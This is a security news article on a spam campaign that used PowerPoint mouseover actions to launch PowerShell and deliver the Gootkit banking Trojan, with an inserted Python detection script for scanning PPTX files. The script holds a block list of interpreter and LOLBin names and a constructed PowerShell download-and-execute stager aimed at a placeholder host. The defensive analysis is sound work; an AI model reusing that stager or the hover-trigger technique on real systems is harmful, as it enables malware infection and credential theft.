
Mouseover Macro Campaign Delivers Gootkit Trojan Via PowerPoint

Earlier this week, a researcher analyzed a newly detected technique for delivering malware involving PowerPoint files and mouseover events. Today, Trend Micro has published details on a spam campaign it detected in late May using the same technique.


TrendLabs researchers Rubio Wu and Marshall Chen suggest that although the recent campaign was limited (not unusual in itself, since attackers try to avoid detection), it could be considered a dry run for future campaigns. The campaign particularly targeted organizations in the U.K., Poland, the Netherlands, and Sweden.

As in the earlier analysis, the emails carried a subject line consisting of a finance-related word followed by a number. “The pattern we saw,” notes the TrendLabs report, “is ‘[fee] #__NUM__’, indicating that the operator, or the service provider that sends the spam email on behalf of the operator, are tracking the spam messages they send.”

The email is disguised as an invoice or purchase order and carries a malicious PowerPoint Show (.ppsx) attachment, which opens directly in presentation mode rather than in the editor. The malicious content attempts to run as soon as the mouse pointer passes over the slide, but Microsoft’s Protected View normally blocks it unless and until the user chooses to enable the content.

“Hence,” say the researchers, “a key ingredient in the infection chain is social engineering — luring the victim into opening the file and enabling the malware-laced content to run on the system.” The report does not elaborate on this, merely pointing out that, “A socially engineered email and mouse hover — and possibly a click if the latter is disabled — are all it would take to infect the victim.”

Once the content is allowed to run, an embedded PowerShell command downloads a second-stage downloader, a JScript Encoded (JSE) file detected as JS_NEMUCOD.ELDSAUGH, which in turn retrieves the final payload from a command-and-control (C&C) server.
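The infection chain above starts with a hover-triggered action inside the PowerPoint package. As an added example (not code from the Trend Micro report or from SecurityWeek), the Python triage script below unpacks a PowerPoint OOXML file and flags any slide run whose mouse-over or click action would launch an external program. It assumes the trigger is expressed as a DrawingML hlinkMouseOver or hlinkClick element carrying a ppaction://program action whose relationship target is the command line; the sample document, the lure text and the PowerShell one-liner it contains are constructed here for the demonstration and are not taken from the campaign.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# OOXML namespaces used by PresentationML slides and package relationships.
NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_P = "http://schemas.openxmlformats.org/presentationml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"

# ppaction://program tells PowerPoint to run the relationship target as a program.
PROGRAM_ACTION = "ppaction://program"
# Interpreters and LOLBins commonly used as the first stage of a download chain.
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b",
    re.I,
)


def _relationships(z: zipfile.ZipFile, slide_name: str) -> dict:
    """Map rId -> (Target, TargetMode) from ppt/slides/_rels/<slide>.rels."""
    head, _, tail = slide_name.rpartition("/")
    rels_name = f"{head}/_rels/{tail}.rels"
    targets = {}
    if rels_name in z.namelist():
        root = ET.fromstring(z.read(rels_name))
        for rel in root.iter(f"{{{NS_REL}}}Relationship"):
            targets[rel.get("Id")] = (rel.get("Target", ""), rel.get("TargetMode", ""))
    return targets


def scan_pptx(data: bytes) -> list:
    """Return one finding per hover/click action that would run an external program."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not (name.startswith("ppt/slides/slide") and name.endswith(".xml")):
                continue
            rels = _relationships(z, name)
            root = ET.fromstring(z.read(name))
            for trigger in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter(f"{{{NS_A}}}{trigger}"):
                    action = el.get("action", "")
                    target, mode = rels.get(el.get(f"{{{NS_R}}}id"), ("", ""))
                    # Flag an explicit program action, or a hyperlink whose target is an interpreter.
                    if action == PROGRAM_ACTION or LOLBIN_RE.search(target):
                        findings.append({
                            "slide": name,
                            "trigger": trigger,    # hover fires without any click
                            "action": action,
                            "target": target,      # the command line PowerPoint would launch
                            "external": mode == "External",
                        })
    return findings


def build_sample(target: str, trigger: str = "hlinkMouseOver", action: str = PROGRAM_ACTION) -> bytes:
    """Constructed minimal slide package for testing; NOT a real campaign sample."""
    action_attr = f' action="{action}"' if action else ""
    safe_target = escape(target, {'"': "&quot;"})
    slide = (
        f'<p:sld xmlns:a="{NS_A}" xmlns:r="{NS_R}" xmlns:p="{NS_P}"><p:cSld><p:spTree>'
        f'<p:sp><p:txBody><a:p><a:r><a:rPr lang="en-US">'
        f'<a:{trigger} r:id="rId2"{action_attr}/></a:rPr>'
        f'<a:t>Invoice attached</a:t></a:r></a:p></p:txBody></p:sp>'
        f'</p:spTree></p:cSld></p:sld>'
    )
    rels = (
        f'<Relationships xmlns="{NS_REL}">'
        f'<Relationship Id="rId2" Type="{NS_R}/hyperlink" '
        f'Target="{safe_target}" TargetMode="External"/>'
        f'</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/slides/slide1.xml", slide)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed stager-style command line; the .invalid TLD keeps it inert.
    cmd = ("powershell -NoP -NonI -W Hidden -Exec Bypass "
           "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\"")
    for f in scan_pptx(build_sample(cmd)):
        print(f"{f['slide']}: {f['trigger']} -> {f['action'] or '(hyperlink)'} :: {f['target']}")
    print("benign link findings:", scan_pptx(build_sample("https://example.invalid/", "hlinkClick", action="")))
```

Run against a real attachment with `scan_pptx(open(path, "rb").read())`. The check keys on the action type and the relationship target rather than on the command text, so it still fires when the one-liner is obfuscated, and it reports whether the trigger is a hover (no click required) or a click, which is the distinction the researchers draw.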

The payload detected by TrendLabs is a variant of the OTLARD banking Trojan, also known as Gootkit. This is well-known in Europe for stealing credentials and bank account information. TrendLabs suggests the detected campaign may be the precursor of wider use. “It wouldn’t be far-fetched for other malware like ransomware to follow suit,” say the researchers; “for instance, considering the notoriety of OTLARD/Gootkit’s operators for spreading other threats in their payloads, as well as ransomware’s history with using malware-laced Office documents.”


This behavior is typical of the Gootkit operators: small campaigns focused on a limited number of countries, run by innovative and technically capable operators. Earlier this year, the Gootkit malware moved from web injection to redirection, a harder technique to implement but potentially a more successful way of deceiving users.

The danger inherent in this type of mouseover attack is that the trigger can be entirely invisible to the victim: no click is needed, only the pointer passing over the slide. Ensuring that Microsoft’s Protected View is enforced will at least prevent the malicious content from running automatically, but that still relies on the user noticing the prompt and refusing to enable it. Locking down PowerShell (restricting who can run it, constraining what scripts may do, and logging what they execute) and adopting best practices for similar administrative tools will also help, since the first stage of the chain depends on PowerShell running unhindered.

The bottom line, however, is that security awareness is the best defense against this new breed of document-based attacks. “Given that social engineering is vital in these attacks,” say the researchers, “fostering a culture of cybersecurity among employees helps mitigate a weakness for which there is no silver bullet — the human psyche.”

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.
